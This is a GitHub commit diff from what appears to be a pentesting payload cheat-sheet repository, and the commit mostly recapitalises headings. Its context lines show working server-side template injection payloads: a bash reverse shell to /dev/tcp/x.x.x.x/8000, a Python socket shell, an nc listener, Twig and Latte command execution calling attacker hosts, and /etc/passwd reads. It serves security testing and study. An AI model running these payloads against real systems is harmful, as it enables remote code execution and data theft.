Skip to content

Commit 32d9f75

Browse files
committed
XPATH + XSS + XXE + XSLT
1 parent 8c09568 commit 32d9f75

File tree

15 files changed

+234
-200
lines changed

15 files changed

+234
-200
lines changed

SQL Injection/Cassandra Injection.md

+4-4
Original file line numberDiff line numberDiff line change
@@ -6,8 +6,8 @@
66
## Summary
77

88
* [CQL Injection Limitations](#cql-injection-limitations)
9-
* [Cassandra comment](#cassandra-comment)
10-
* [Cassandra - Login Bypass](#cassandra---login-bypass)
9+
* [Cassandra Comment](#cassandra-comment)
10+
* [Cassandra Login Bypass](#cassandra-login-bypass)
1111
* [Example #1](#example-1)
1212
* [Example #2](#example-2)
1313
* [References](#references)
@@ -26,14 +26,14 @@
2626
* CQL does not allow subqueries or other nested statements, so a query like `SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);` would be rejected.
2727

2828

29-
## Cassandra comment
29+
## Cassandra Comment
3030

3131
```sql
3232
/* Cassandra Comment */
3333
```
3434

3535

36-
## Cassandra - Login Bypass
36+
## Cassandra Login Bypass
3737

3838
### Example #1
3939

SQL Injection/DB2 Injection.md

-1
Original file line numberDiff line numberDiff line change
@@ -54,7 +54,6 @@
5454

5555
## DB2 Methodology
5656

57-
5857
| Description | SQL Query |
5958
| ---------------- | ------------------------------------ |
6059
| List databases | `SELECT distinct(table_catalog) FROM sysibm.tables` |

Server Side Template Injection/ASP.md

+4-4
Original file line numberDiff line numberDiff line change
@@ -6,8 +6,8 @@
66
## Summary
77

88
- [ASP.NET Razor](#aspnet-razor)
9-
- [ASP.NET Razor - Basic injection](#aspnet-razor---basic-injection)
10-
- [ASP.NET Razor - Command execution](#aspnet-razor---command-execution)
9+
- [ASP.NET Razor - Basic Injection](#aspnet-razor---basic-injection)
10+
- [ASP.NET Razor - Command Execution](#aspnet-razor---command-execution)
1111
- [References](#references)
1212

1313

@@ -18,13 +18,13 @@
1818
> Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages.
1919
2020

21-
### ASP.NET Razor - Basic injection
21+
### ASP.NET Razor - Basic Injection
2222

2323
```powershell
2424
@(1+2)
2525
```
2626

27-
### ASP.NET Razor - Command execution
27+
### ASP.NET Razor - Command Execution
2828

2929
```csharp
3030
@{

Server Side Template Injection/PHP.md

+10-10
Original file line numberDiff line numberDiff line change
@@ -8,13 +8,13 @@
88
- [Templating Libraries](#templating-libraries)
99
- [Smarty](#smarty)
1010
- [Twig](#twig)
11-
- [Twig - Basic injection](#twig---basic-injection)
12-
- [Twig - Template format](#twig---template-format)
11+
- [Twig - Basic Injection](#twig---basic-injection)
12+
- [Twig - Template Format](#twig---template-format)
1313
- [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading)
14-
- [Twig - Code execution](#twig---code-execution)
14+
- [Twig - Code Execution](#twig---code-execution)
1515
- [Latte](#latte)
16-
- [Latte - Basic injection](#latte---basic-injection)
17-
- [Latte - Code execution](#latte---code-execution)
16+
- [Latte - Basic Injection](#latte---basic-injection)
17+
- [Latte - Code Execution](#latte---code-execution)
1818
- [patTemplate](#pattemplate)
1919
- [PHPlib](#phplib-and-html_template_phplib)
2020
- [Plates](#plates)
@@ -53,7 +53,7 @@
5353
[Official website](https://twig.symfony.com/)
5454
> Twig is a modern template engine for PHP.
5555
56-
### Twig - Basic injection
56+
### Twig - Basic Injection
5757

5858
```python
5959
{{7*7}}
@@ -63,7 +63,7 @@
6363
{{app.request.server.all|join(',')}}
6464
```
6565

66-
### Twig - Template format
66+
### Twig - Template Format
6767

6868
```python
6969
$output = $twig > render (
@@ -84,7 +84,7 @@ $output = $twig > render (
8484
{{include("wp-config.php")}}
8585
```
8686

87-
### Twig - Code execution
87+
### Twig - Code Execution
8888

8989
```python
9090
{{self}}
@@ -118,13 +118,13 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
118118

119119
## Latte
120120

121-
### Latte - Basic injection
121+
### Latte - Basic Injection
122122

123123
```php
124124
{var $X="POC"}{$X}
125125
```
126126

127-
### Latte - Code execution
127+
### Latte - Code Execution
128128

129129
```php
130130
{php system('nslookup oastify.com')}

Server Side Template Injection/Python.md

+36-36
Original file line numberDiff line numberDiff line change
@@ -7,29 +7,29 @@
77

88
- [Templating Libraries](#templating-libraries)
99
- [Django](#django)
10-
- [Django - Basic injection](#django---basic-injection)
11-
- [Django - Cross-site scripting](#django---cross-site-scripting)
12-
- [Django - Debug information leak](#django---debug-information-leak)
13-
- [Django - Leaking app's Secret Key](#django---leaking-apps-secret-key)
10+
- [Django - Basic Injection](#django---basic-injection)
11+
- [Django - Cross-Site Scripting](#django---cross-site-scripting)
12+
- [Django - Debug Information Leak](#django---debug-information-leak)
13+
- [Django - Leaking App's Secret Key](#django---leaking-apps-secret-key)
1414
- [Django - Admin Site URL leak](#django---admin-site-url-leak)
15-
- [Django - Admin username and password hash leak](#django---admin-username-and-password-hash-leak)
15+
- [Django - Admin Username and Password Hash Leak](#django---admin-username-and-password-hash-leak)
1616
- [Jinja2](#jinja2)
17-
- [Jinja2 - Basic injection](#jinja2---basic-injection)
18-
- [Jinja2 - Template format](#jinja2---template-format)
17+
- [Jinja2 - Basic Injection](#jinja2---basic-injection)
18+
- [Jinja2 - Template Format](#jinja2---template-format)
1919
- [Jinja2 - Debug Statement](#jinja2---debug-statement)
20-
- [Jinja2 - Dump all used classes](#jinja2---dump-all-used-classes)
21-
- [Jinja2 - Dump all config variables](#jinja2---dump-all-config-variables)
22-
- [Jinja2 - Read remote file](#jinja2---read-remote-file)
23-
- [Jinja2 - Write into remote file](#jinja2---write-into-remote-file)
20+
- [Jinja2 - Dump All Used Classes](#jinja2---dump-all-used-classes)
21+
- [Jinja2 - Dump All Config Variables](#jinja2---dump-all-config-variables)
22+
- [Jinja2 - Read Remote File](#jinja2---read-remote-file)
23+
- [Jinja2 - Write Into Remote File](#jinja2---write-into-remote-file)
2424
- [Jinja2 - Remote Command Execution](#jinja2---remote-command-execution)
25-
- [Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce)
26-
- [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
27-
- [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
28-
- [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
29-
- [Exploit the SSTI by writing an evil config file.](#exploit-the-ssti-by-writing-an-evil-config-file)
30-
- [Jinja2 - Filter bypass](#jinja2---filter-bypass)
25+
- [Forcing Output On Blind RCE](#jinja2---forcing-output-on-blind-rce)
26+
- [Exploit The SSTI By Calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
27+
- [Exploit The SSTI By Calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
28+
- [Exploit The SSTI By Calling Popen Without Guessing The Offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
29+
- [Exploit The SSTI By Writing an Evil Config File](#exploit-the-ssti-by-writing-an-evil-config-file)
30+
- [Jinja2 - Filter Bypass](#jinja2---filter-bypass)
3131
- [Tornado](#tornado)
32-
- [Tornado - Basic injection](#tornado---basic-injection)
32+
- [Tornado - Basic Injection](#tornado---basic-injection)
3333
- [Tornado - Remote Command Execution](#tornado---remote-command-execution)
3434
- [Mako](#mako)
3535
- [Mako - Remote Command Execution](#mako---remote-command-execution)
@@ -54,7 +54,7 @@
5454

5555
Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2.
5656

57-
### Django - Basic injection
57+
### Django - Basic Injection
5858

5959
```python
6060
{% csrf_token %} # Causes error with Jinja2
@@ -63,20 +63,20 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
6363
```
6464

6565

66-
### Django - Cross-site scripting
66+
### Django - Cross-Site Scripting
6767

6868
```python
6969
{{ '<script>alert(3)</script>' }}
7070
{{ '<script>alert(3)</script>' | safe }}
7171
```
7272

73-
### Django - Debug information leak
73+
### Django - Debug Information Leak
7474

7575
```python
7676
{% debug %}
7777
```
7878

79-
### Django - Leaking app’s Secret Key
79+
### Django - Leaking App's Secret Key
8080

8181
```python
8282
{{ messages.storages.0.signer.key }}
@@ -89,7 +89,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
8989
{% include 'admin/base.html' %}
9090
```
9191

92-
### Django - Admin username and password hash leak
92+
### Django - Admin Username And Password Hash Leak
9393

9494

9595
```
@@ -104,7 +104,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
104104
[Official website](https://jinja.palletsprojects.com/)
105105
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
106106
107-
### Jinja2 - Basic injection
107+
### Jinja2 - Basic Injection
108108

109109
```python
110110
{{4*4}}[[5*5]]
@@ -115,7 +115,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
115115
Jinja2 is used by Python Web Frameworks such as Django or Flask.
116116
The above injections have been tested on a Flask application.
117117

118-
### Jinja2 - Template format
118+
### Jinja2 - Template Format
119119

120120
```python
121121
{% extends "layout.html" %}
@@ -139,7 +139,7 @@ If the Debug Extension is enabled, a `{% debug %}` tag will be available to dump
139139

140140
Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
141141

142-
### Jinja2 - Dump all used classes
142+
### Jinja2 - Dump All Used Classes
143143

144144
```python
145145
{{ [].class.base.subclasses() }}
@@ -153,7 +153,7 @@ Access `__globals__` and `__builtins__`:
153153
{{ self.__init__.__globals__.__builtins__ }}
154154
```
155155

156-
### Jinja2 - Dump all config variables
156+
### Jinja2 - Dump All Config Variables
157157

158158
```python
159159
{% for key, value in config.iteritems() %}
@@ -162,7 +162,7 @@ Access `__globals__` and `__builtins__`:
162162
{% endfor %}
163163
```
164164

165-
### Jinja2 - Read remote file
165+
### Jinja2 - Read Remote File
166166

167167
```python
168168
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
@@ -172,7 +172,7 @@ Access `__globals__` and `__builtins__`:
172172
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
173173
```
174174

175-
### Jinja2 - Write into remote file
175+
### Jinja2 - Write Into Remote File
176176

177177
```python
178178
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
@@ -186,7 +186,7 @@ Listen for connection
186186
nc -lnvp 8000
187187
```
188188

189-
#### Jinja2 - Forcing output on blind RCE
189+
#### Jinja2 - Forcing Output On Blind RCE
190190

191191
You can import Flask functions to return an output from the vulnerable page.
192192

@@ -203,7 +203,7 @@ def hook(*args, **kwargs):
203203
```
204204

205205

206-
#### Exploit the SSTI by calling os.popen().read()
206+
#### Exploit The SSTI By Calling os.popen().read()
207207

208208
```python
209209
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
@@ -235,7 +235,7 @@ With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a pa
235235

236236
Source: https://twitter.com/podalirius_/status/1655970628648697860
237237

238-
#### Exploit the SSTI by calling subprocess.Popen
238+
#### Exploit The SSTI By Calling subprocess.Popen
239239

240240
:warning: the number 396 will vary depending of the application.
241241

@@ -244,7 +244,7 @@ Source: https://twitter.com/podalirius_/status/1655970628648697860
244244
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
245245
```
246246

247-
#### Exploit the SSTI by calling Popen without guessing the offset
247+
#### Exploit The SSTI By Calling Popen Without Guessing The Offset
248248

249249
```python
250250
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
@@ -257,7 +257,7 @@ In another GET parameter include a variable named "input" that contains the comm
257257
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
258258
```
259259

260-
#### Exploit the SSTI by writing an evil config file.
260+
#### Exploit The SSTI By Writing An Evil Config File
261261

262262
```python
263263
# evil config
@@ -270,7 +270,7 @@ In another GET parameter include a variable named "input" that contains the comm
270270
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
271271
```
272272

273-
### Jinja2 - Filter bypass
273+
### Jinja2 - Filter Bypass
274274

275275
```python
276276
request.__class__
@@ -313,7 +313,7 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http
313313

314314
## Tornado
315315

316-
### Tornado - Basic injection
316+
### Tornado - Basic Injection
317317

318318
```py
319319
{{7*7}}

Type Juggling/README.md

+5-5
Original file line numberDiff line numberDiff line change
@@ -6,8 +6,8 @@
66
## Summary
77

88
* [Loose Comparison](#loose-comparison)
9-
* [True statements](#true-statements)
10-
* [NULL statements](#null-statements)
9+
* [True Statements](#true-statements)
10+
* [NULL Statements](#null-statements)
1111
* [Loose Comparison](#loose-comparison)
1212
* [Magic Hashes](#magic-hashes)
1313
* [Methodology](#methodology)
@@ -22,7 +22,7 @@
2222
- **Loose** comparison: using `== or !=` : both variables have "the same value".
2323
- **Strict** comparison: using `=== or !==` : both variables have "the same type and the same value".
2424

25-
### True statements
25+
### True Statements
2626

2727
| Statement | Output |
2828
| --------------------------------- |:---------------:|
@@ -44,7 +44,7 @@
4444
4545
![LooseTypeComparison](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/Images/table_representing_behavior_of_PHP_with_loose_type_comparisons.png?raw=true)
4646

47-
Loose Type Comparisons occurs in many languages:
47+
Loose Type comparisons occurs in many languages:
4848

4949
* [MariaDB](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mariadb)
5050
* [MySQL](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mysql)
@@ -56,7 +56,7 @@ Loose Type Comparisons occurs in many languages:
5656
* [SQLite](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/SQLite/2.6.0)
5757

5858

59-
### NULL statements
59+
### NULL Statements
6060

6161
| Function | Statement | Output |
6262
| -------- | -------------------------- |:---------------:|

0 commit comments

Comments
 (0)